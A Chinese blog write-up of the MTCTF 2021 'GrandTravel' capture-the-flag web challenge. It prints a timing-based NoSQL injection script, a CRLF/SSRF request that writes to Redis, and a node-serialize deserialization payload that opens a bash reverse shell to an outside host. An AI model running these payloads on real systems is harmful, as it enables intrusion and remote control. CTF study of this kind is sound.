MTCTF2021-GrandTravel

最新推荐文章于 2023-09-21 08:07:09 发布
最新推荐文章于 2023-09-21 08:07:09 发布
阅读量863 收藏 1
点赞数 1
分类专栏: CTF复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anwen12/article/details/122136806
版权

GrandTravel

0x01 知识点

nosql注入+ssrf+node反序列化+node拆分攻击+ftp提权

0x02 解题

1 sql注入拿到密码

首先拿到源码不难看出登录位置有注入嫌疑(感谢葫芦卜师傅的payload)

参考

https://blog.szfszf.top/article/9/

 burp0_data = {"username": f"admin\"&&this[\"pass\"+\"word\"][{pos}]>\"{chr(mid)}\"&&sleep(1100)||this[\"user\"+\"name\"]==\"admin", "password": "admin", "login": "login"}
        # requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

贴上sql注入的exp

import requests,time

url = "http://192.168.76.128:3000/login"

username=""
for pos in range(0,100):
    for mid in range(35,128):
        ti = time.time()
        burp0_data = {"username": f"admin\"&&this[\"pass\"+\"word\"][{pos}]<\"{chr(mid)}\"&&sleep(1100)||this[\"user\"+\"name\"]==\"admin", "password": "admin", "login": "login"}
        requests.post(url,data=burp0_data)
        tim = time.time()
        # burp0_data = {"username": f"admin\"&&this[\"pass\"+\"word\"][{pos}]>\"{chr(mid)}\"&&sleep(1100)||this[\"user\"+\"name\"]==\"admin", "password": "admin", "login": "login"}
        if(tim - ti > 1):
            print(burp0_data["username"])
            username += chr(mid-1)
            print(username)
            break

    # ip  192.168.76.1

image-20211224214339520

2 ssrf 打redis反序列化数据

 192.168.76.1  ip

所以redis中的key为

admin492a66848a0b6c73cff8f5b4ace752f9

先访问signup端口创建一个redis缓存数据。

然后我们用gopher去生成反序列化数据

3 node反序列化rce

https://threezh1.com/2020/01/30/NodeJsVulns/#node-serialize%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E6%BC%8F%E6%B4%9E-CVE-2017-5941

serialize = require('node-serialize');
var test = {
 rce : function(){require('child_process').exec('bash -i >& /dev/tcp/ip/8080 0>&1',function(error, stdout, stderr){console.log(stdout)})},
}
console.log("序列化生成的 Payload: \n" + new Buffer(serialize.serialize(test)).toString('base64'));

生成我们需要的exp。但是我们在反序列化的时候需要我们执行相应的函数,所以需要加上()

{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('bash -i >& /dev/tcp/ip/8080 0>&1',function(error, stdout, stderr){console.log(stdout)});}()"}

然后生成redis

*2
$4
AUTH
$31
Red1S_P0ssw0rd_a456wd4654aw54wd
*1
$7
COMMAND
*3
$3
set
$36
admin492a66848a0b6c73cff8f5b4ace752f9
$224
payload

http://0:6379/%C4%8DHTTP/1.1%C4%8D%C4%8A*2%C4%8D%C4%8A$4%C4%8D%C4%8AAUTH%C4%8D%C4%8A$31%C4%8D%C4%8ARed1S_P0ssw0rd_a456wd4654aw54wd%C4%8D%C4%8A*1%C4%8D%C4%8A$7%C4%8D%C4%8ACOMMAND%C4%8D%C4%8A*3%C4%8D%C4%8A$3%C4%8D%C4%8Aset%C4%8D%C4%8A$36%C4%8D%C4%8Admin492a66848a0b6c73cff8f5b4ace752f9%C4%8D%C4%8A$224%C4%8D%C4%8AeyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24oKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnYmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0Mi45My4xMDMvODA4MCAwPiYxJyxmdW5jdGlvbihlcnJvciwgc3Rkb3V0LCBzdGRlcnIpe2NvbnNvbGUubG9nKHN0ZG91dCl9KSgpO30ifQ==%C4%8D%C4%8A

这里需要注意我们在传递参数的时候url编码问题会把+号译码成为空格,所以我们需要对+号进行url编码

http://0:6379/%C4%8DHTTP/1.1%C4%8D%C4%8A*2%C4%8D%C4%8A$4%C4%8D%C4%8AAUTH%C4%8D%C4%8A$31%C4%8D%C4%8ARed1S_P0ssw0rd_a456wd4654aw54wd%C4%8D%C4%8A*1%C4%8D%C4%8A$7%C4%8D%C4%8ACOMMAND%C4%8D%C4%8A*3%C4%8D%C4%8A$3%C4%8D%C4%8Aset%C4%8D%C4%8A$36%C4%8D%C4%8Admin492a66848a0b6c73cff8f5b4ace752f9%C4%8D%C4%8A$224%C4%8D%C4%8AeyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24oKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnYmFzaCAtaSA%2bJiAvZGV2L3RjcC84LjE0Mi45My4xMDMvODA4MCAwPiYxJyxmdW5jdGlvbihlcnJvciwgc3Rkb3V0LCBzdGRlcnIpe2NvbnNvbGUubG9nKHN0ZG91dCl9KSgpO30ifQ==%C4%8D%C4%8A

image-20211224220607401

4 ftp提权

image-20211224220728987

可以看到ftp,但是我们在连接vps的服务时候发现不能成功上传文件,原因是因为ftp的被动模式返回的ip变成了内网ip,导致gg,所以我们要用node重新启动一个ftp server。然后下载准备好的东西。

image-20211224221148200

image-20211224221203664

然后就成功拿到。

image-20211224221230243

Dem0@
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第四届2021美团网络安全 MT-CTF writeup
ShenZ的博客
12-12 5624
第四届2021美团网络安全 MT-CTF 文章目录第四届2021美团网络安全 MT-CTFMISCUn(ix)zip오징어 게임 鱿鱼游戏BoomCryptoSymbol MISC Un(ix)zip flag{Welc0me_Unz1p_Wonder4} 오징어 게임 鱿鱼游戏 7-zip可以看到加密算法ZipCrypto Store 再加上备注里提示flagornot.txt,采用明文爆破 明文爆破参考:https://blog.csdn.net/q851579181q/articl
[MTCTF 2021]hamburgerRSA(部分可知问题求解)
shshss64的博客
11-18 357
n部分值已知
2021 美团MTCTF babyrop
qq_33769475的博客
12-16 706
Canary机制的绕过+栈迁移 漏洞分析 拿到题目检查保护和链接的动态库(题目给的是libc-2.27.so,分析本地的/lib/x86_64-linux-gnu/libc.so.6就行) 这题的重点在于Canary保护 ┌──(root????e267254b2ec9)-[/home/babyrop] └─# checksec babyrop [*] '/home/babyrop/babyrop' Arch: amd64-64-little RELRO: Full RELRO
ctf2021/1/14
u012163017的博客
01-19 338
CTF笔记汇编地址总线功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 汇编 地址总线 寻址能力 : 一个cpu有N根地址线,则可以说这个CPU的地址总线的宽度为N。这样的CPU最多可寻找2的N次方个内存单元。 一个字节是一个内存
re [MTCTF 2021]wow复现
m0_75098930的博客
04-13 196
32位exe,upx壳,直接自动脱掉就行,但ida反编译出了问题,最开始看伪代码有点困难,先看看汇编,发现大体流程,结合题目hint是xxtea,手动修改函数和栈。最后那里还是有点问题,是输出right字符串的,不是加密代码,没有再处理了。其中delta是1732584193,密钥盒key是。是flag了,整理一下就行。xxtea的加密解密参见。
MTCTF_Crypto
shikaku_的博客
05-25 686
MTCTFeasy_RSARandom后记 一共有四道,做出了前两道,bob师傅ak了,记录一下 easy_RSA 第一步给了这些信息: n:0x9371c61a2b760109781f229d43c6f05b58de65aa2a674ff92334cb5219132448d72c1293c145eb6f35e58791669f2d8d3b6ce506f4b3543beb947cf119f463a00bd33a33c4d566c4fd3f4c73c697fa5f3bf65976284b9cc96ec8172
MTCTF复现[ezcms]
o3Ev的博客
05-28 812
MTCTF复现[ezcms] 环境配置: docker pull y4tacker/ez_yxcms:1.0 进入界面,目录扫描一下,得到: 访问robots.txt: 在这儿找到密码,md5解密即可:attack 用户attack,密码attack登陆就可以了 看到头像处的url为 class/showImage.php?file=logo.jpg 应该可以进行文件读取,所以去掉logo.jpg,然后bp抓包,得到源码: <?php error_reporting(0); if ($_G
[MTCTF]从出题人视角看ez_cms
Y4tacker的博客
05-23 1424
文章目录写在前面DockerhubWp 写在前面 太惨了,太傻了我,迷迷糊糊写了两天CMS,又累又自闭,还搞错了东西,给各位大师傅们道歉了,下面大师傅们要是瞧得上的化就那啥可以复现复现 Dockerhub docker pull y4tacker/ez_yxcms:1.0 随便写个docker-compose.yml version: "2" services: web: build: . image: yyds restart: always ports:
“蚁景杯”WUSTCTF2021新生赛writeup
weixin_45883223的博客
01-30 4488
“蚁景杯”WUSTCTF2021新生赛writeupCrypto签到滴答AES With RSAGMCVigeneregive you d银河信号MiscErxian BridgeZero Widthbinarybase64Tall ShanBenhideReverseX0rbabypycbabyjvavequationsez_resosotablesWebEasyWebWeb2矛盾命令执行CoverEasyUploadBabyPHPPwn你管这叫新生赛?shellcodeez_heap2.272.23获取
[MTCTF 2021]Random
最新发布
m0_68259687的博客
09-21 191
拿到题目之后,将其拖入查壳软件中进行查壳,可以看见其中并未加壳jiang'qi将其拖入IDA中进行分析。
[GKCTF 2021]Random(MT19973随机数破解)
m0_62506844的博客
04-19 4178
由此而已发现,如果生成64位随机数,那么会先生成一个32位随机数a,然后再生成一个32位随机数b,将b左移32位去加上a,得到一个64位的随机数。我们把64位和96位的随机数拆分成32位,按顺序存入randcrack内,randcrack能帮我们处理并破解MersenneTwister(梅森旋转算法)MT算法能生成1-623个32位随机数,而我们有(32/32+64/32+96/32)*104=624个已知随机数,那么我们就完全可以求出下一个随机数。要求去求生成104组随机数之后的下一个随机数。...
美团杯MEITUAN网络安全大赛CTF2021-humburgerRSA题解
Laffrey的专栏
12-12 786
题目如下: output.txt n = 177269125756508652546242326065138402971542751112423326033880862868822164234452280738170245589798474033047460920552550018968571267978283756742722231922451193 c = 47718022601324543399078395957095083753201631332808949406927091589044837
第四届美团网络安全高校挑战赛_hamburgerRSA
M3ng@L的博客
12-13 647
hamburgerRSA 第四届美团网络安全高校挑战赛 Crypto
[SUCTF2019]MT 87
weixin_44110537的博客
07-20 256
encrypt from Crypto.Random import random from Crypto.Util import number from flag import flag def convert(m): m = m ^ m >> 13 m = m ^ m << 9 & 2029229568 m = m ^ m << 17 & 2245263360 m = m ^ m >> 19 retu
5月全球CTF比赛时间汇总来了!
网络安全
05-03 8300
●5月全球CTF比赛时间汇总来了!●从事网络安全行业工作,怎么能不参加一次CTF比赛了!小编作为一个CTF比赛老鸟,以每次都能做出签到题为荣!下面给大家分享一下5月份CTF比赛时间,比...
MTCTF baby_focal writeup
qq_51868336的博客
05-25 296
MTCTF baby_focal writeup 题目概览 一道glibc2.31的堆题,但漏洞利用过程与新特性没什么关系 开启了seccomp,禁用了execve,也就是我们要用orw来读flag 用了_ptrace函数来反调试,我们直接把它nop掉就行 为了方便调试,我们把两个sleep也nop掉 经典的菜单题 alloc这里值得一提的是采用了calloc来申请堆块,这个函数和malloc的主要区别在于会将堆块的内容清空以及申请堆块的时候不会从tcache里面取
SUCTF2019 MT
pondzhang的专栏
08-02 464
from Crypto.Random import random from Crypto.Util import number def convert(m): m = m ^ m >> 13 m = m ^ m << 9 & 2029229568 m = m ^ m << 17 & 2245263360 m = m ^ m >> 19 return m def transform(message):
【MRCTF—Web】做题+复现记录
Lemon's blog
04-27 1324
套娃 查看源码发现这一串代码, substr_count() 函数计算子串在字符串中出现的次数 $_SERVER['QUERY_STRING'] 例如: http://localhost/aaa/index.php?p=222&q=333 结果: $_SERVER['QUERY_STRING'] = "p=222&q=333"; 想绕过去就必须满足我们传入的参数没有_,而且得通...
美团MTCTF 2022 smtp pwn解
z1r0的博客
09-20 1873
会将mail from的信息存在入from中,如果send to的长度大于0xff,会将sendto的数据赋值给s,需要注意的是这个数据我们可控,没有进行大小限制,而s是有大小限制的,所以直接strcpy会造成栈溢出漏洞,成功发现漏洞。接下来就是如何把flag给带出来,因为直接cat的话是没有回显的,笔者原本想着用wget下载一个木马,然后连上去(哈哈),但是感觉太麻烦了,所以问了些师傅有什么东西可以将cat的东西直接输出到屏幕上,>&1,可以把文件的东西给带出来。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值